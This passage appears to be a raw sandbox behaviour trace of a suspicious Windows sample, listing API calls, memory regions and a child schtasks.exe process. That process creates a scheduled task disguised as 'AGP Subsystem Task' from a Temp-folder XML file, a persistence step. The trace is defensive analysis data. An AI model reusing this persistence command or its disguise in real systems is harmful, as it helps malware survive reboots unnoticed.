[0169.843] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3069e8 | out: hHeap=0x2f0000) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305378) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.844] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305378) returned 0x14
[0169.844] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305378 | out: hHeap=0x2f0000) returned 1
[0169.844] GetProcessHeap () returned 0x2f0000
[0169.844] GetProcessHeap () returned 0x2f0000
[0169.844] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314d20) returned 1
[0169.844] GetProcessHeap () returned 0x2f0000
[0169.844] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x314d20) returned 0x82
[0169.844] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314d20 | out: hHeap=0x2f0000) returned 1
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305738) returned 1
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305738) returned 0x14
[0169.846] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305738 | out: hHeap=0x2f0000) returned 1
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bc0) returned 1
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304bc0) returned 0x10
[0169.846] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bc0 | out: hHeap=0x2f0000) returned 1
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.847] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305020) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305020) returned 0x14
[0169.847] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305020 | out: hHeap=0x2f0000) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305040) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305040) returned 0x14
[0169.847] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305040 | out: hHeap=0x2f0000) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305060) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305060) returned 0x14
[0169.847] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305060 | out: hHeap=0x2f0000) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305080) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305080) returned 0x14
[0169.847] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305080 | out: hHeap=0x2f0000) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bd8) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.848] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304bd8) returned 0x10
[0169.848] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bd8 | out: hHeap=0x2f0000) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050a0) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3050a0) returned 0x14
[0169.848] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050a0 | out: hHeap=0x2f0000) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305118) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305118) returned 0x14
[0169.848] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305118 | out: hHeap=0x2f0000) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305158) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305158) returned 0x14
[0169.848] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305158 | out: hHeap=0x2f0000) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305198) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305198) returned 0x14
[0169.849] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305198 | out: hHeap=0x2f0000) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3051b8) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3051b8) returned 0x14
[0169.849] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3051b8 | out: hHeap=0x2f0000) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305258) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305258) returned 0x14
[0169.849] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305258 | out: hHeap=0x2f0000) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bf0) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304bf0) returned 0x10
[0169.849] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bf0 | out: hHeap=0x2f0000) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305138) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.850] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305138) returned 0x14
[0169.850] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305138 | out: hHeap=0x2f0000) returned 1
[0169.850] GetProcessHeap () returned 0x2f0000
[0169.850] GetProcessHeap () returned 0x2f0000
[0169.850] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304ba8) returned 1
[0169.850] GetProcessHeap () returned 0x2f0000
[0169.850] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304ba8) returned 0x10
[0169.850] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304ba8 | out: hHeap=0x2f0000) returned 1
[0169.850] exit (_Code=0)
Thread:
id = 33
os_tid = 0x4ec
Process:
id = "6"
image_name = "schtasks.exe"
filename = "c:\\windows\\syswow64\\schtasks.exe"
page_root = "0x3b003000"
os_pid = "0x5e0"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "4"
os_parent_pid = "0x830"
cmd_line = "\"schtasks.exe\" /create /f /tn \"AGP Subsystem Task\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1979
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1980
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1981
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1982
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1983
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1984
start_va = 0x100000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1985
start_va = 0x1c0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1986
start_va = 0xeb0000
end_va = 0xeddfff
monitored = 1
entry_point = 0xec7683
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")
Region:
id = 1987
start_va = 0x76d20000
end_va = 0x76ec8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1988
start_va = 0x76f00000
end_va = 0x7707ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1989
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1990
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1991
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1992
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1993
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1994
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1995
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1996
start_va = 0x200000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1997
start_va = 0x73690000
end_va = 0x736cefff
monitored = 0
entry_point = 0x736be088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1998
start_va = 0x73630000
end_va = 0x7368bfff
monitored = 0
entry_point = 0x7366f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1999
start_va = 0x73620000
end_va = 0x73627fff
monitored = 0
entry_point = 0x736220f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 2000
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2001
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2002
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2003
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076b00000"
filename = ""
Region:
id = 2004
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 0
entry_point = 0x76c3a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2005
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076c20000"
filename = ""
Region:
id = 2006
start_va = 0x3b0000
end_va = 0x5dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003b0000"
filename = ""
Region:
id = 2007
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2008
start_va = 0x753c0000
end_va = 0x75406fff
monitored = 0
entry_point = 0x753c74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 2009
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2010
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2011
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2015
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2016
start_va = 0x70000
end_va = 0xd6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2017
start_va = 0x75410000
end_va = 0x754bbfff
monitored = 0
entry_point = 0x7541a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 2018
start_va = 0x76860000
end_va = 0x7695ffff
monitored = 0
entry_point = 0x7687b6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 2019
start_va = 0x75220000
end_va = 0x752affff
monitored = 0
entry_point = 0x75236343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 2020
start_va = 0x759c0000
end_va = 0x759c9fff
monitored = 0
entry_point = 0x759c36a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 2021
start_va = 0x74d40000
end_va = 0x74ddcfff
monitored = 0
entry_point = 0x74d73fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 2022
start_va = 0x76a60000
end_va = 0x76afffff
monitored = 0
entry_point = 0x76a749e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 2023
start_va = 0x759a0000
end_va = 0x759b8fff
monitored = 0
entry_point = 0x759a4975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 2024
start_va = 0x76970000
end_va = 0x76a5ffff
monitored = 0
entry_point = 0x76980569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 2025
start_va = 0x74a50000
end_va = 0x74aaffff
monitored = 0
entry_point = 0x74a6a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 2026
start_va = 0x74a40000
end_va = 0x74a4bfff
monitored = 0
entry_point = 0x74a410e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 2027
start_va = 0x75740000
end_va = 0x7589bfff
monitored = 0
entry_point = 0x7578ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 2028
start_va = 0x75130000
end_va = 0x751befff
monitored = 0
entry_point = 0x75133fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 2029
start_va = 0x751c0000
end_va = 0x75216fff
monitored = 0
entry_point = 0x751d9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 2030
start_va = 0x74920000
end_va = 0x74928fff
monitored = 0
entry_point = 0x74921830
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\SysWOW64\\ktmw32.dll" (normalized: "c:\\windows\\syswow64\\ktmw32.dll")
Region:
id = 2031
start_va = 0x140000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 2032
start_va = 0x5e0000
end_va = 0x767fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 2033
start_va = 0xe0000
end_va = 0xfdfff
monitored = 0
entry_point = 0xf158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2034
start_va = 0xe0000
end_va = 0xfdfff
monitored = 0
entry_point = 0xf158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2035
start_va = 0x75550000
end_va = 0x755affff
monitored = 0
entry_point = 0x7556158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2036
start_va = 0x74c40000
end_va = 0x74d0bfff
monitored = 0
entry_point = 0x74c4168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 2038
start_va = 0x770000
end_va = 0x8f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000770000"
filename = ""
Region:
id = 2039
start_va = 0xee0000
end_va = 0x22dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ee0000"
filename = ""
Region:
id = 2040
start_va = 0xe0000
end_va = 0xf1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui")
Region:
id = 2041
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2042
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 2043
start_va = 0x170000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 2044
start_va = 0x733a0000
end_va = 0x733a8fff
monitored = 0
entry_point = 0x733a1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 2045
start_va = 0x900000
end_va = 0xbcefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2048
start_va = 0x73a10000
end_va = 0x73a8ffff
monitored = 0
entry_point = 0x73a237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 2049
start_va = 0x200000
end_va = 0x26ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2050
start_va = 0x330000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 2057
start_va = 0x3b0000
end_va = 0x48efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 2058
start_va = 0x4e0000
end_va = 0x5dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 2059
start_va = 0x270000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 2060
start_va = 0xbe0000
end_va = 0xc1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000be0000"
filename = ""
Region:
id = 2061
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 2062
start_va = 0x150000
end_va = 0x150fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 2063
start_va = 0x754c0000
end_va = 0x75542fff
monitored = 0
entry_point = 0x754c23d2
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 2064
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 2065
start_va = 0x6e990000
end_va = 0x6ea0cfff
monitored = 0
entry_point = 0x6e99166a
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll")
Thread:
id = 34
os_tid = 0x3b8
[0170.355] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x13fdd8 | out: lpSystemTimeAsFileTime=0x13fdd8*(dwLowDateTime=0xdf1a6820, dwHighDateTime=0x1d8a8be))
[0170.355] GetCurrentProcessId () returned 0x5e0
[0170.355] GetCurrentThreadId () returned 0x3b8
[0170.355] GetTickCount () returned 0x167016d
[0170.355] RtlQueryPerformanceCounter () returned 0x1
[0170.356] GetModuleHandleA (lpModuleName=0x0) returned 0xeb0000
[0170.356] __set_app_type (_Type=0x1)
[0170.356] __p__fmode () returned 0x754b31f4
[0170.356] __p__commode () returned 0x754b31fc
[0170.356] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xec7881) returned 0x0
[0170.356] __wgetmainargs (in: _Argc=0xed9e6c, _Argv=0xed9e74, _Env=0xed9e70, _DoWildCard=0, _StartInfo=0xed9e80 | out: _Argc=0xed9e6c, _Argv=0xed9e74, _Env=0xed9e70) returned 0
[0170.357] _onexit (_Func=0xed0fe2) returned 0xed0fe2
[0170.357] _onexit (_Func=0xed0ff3) returned 0xed0ff3
[0170.357] _onexit (_Func=0xed1002) returned 0xed1002
[0170.357] _onexit (_Func=0xed101e) returned 0xed101e
[0170.357] _onexit (_Func=0xed103a) returned 0xed103a
[0170.357] _onexit (_Func=0xed1056) returned 0xed1056
[0170.357] _onexit (_Func=0xed1072) returned 0xed1072
[0170.358] _onexit (_Func=0xed108e) returned 0xed108e
[0170.358] _onexit (_Func=0xed10aa) returned 0xed10aa
[0170.358] _onexit (_Func=0xed10c6) returned 0xed10c6
[0170.358] _onexit (_Func=0xed10e2) returned 0xed10e2
[0170.358] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0170.358] WinSqmIsOptedIn () returned 0x0
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.359] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4ef060
[0170.359] SetLastError (dwErrCode=0x0)
[0170.359] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0170.359] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0170.359] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0170.359] VerifyVersionInfoW (in: lpVersionInformation=0x13f850, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x13f850) returned 1
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.359] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4bb8
[0170.359] lstrlenW (lpString="") returned 0
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.359] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x2) returned 0x4f4fa0
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.359] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f4fb0
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.359] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4bd0
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f4fd0
[0170.360] GetProcessHeap () returned 0x4e0000
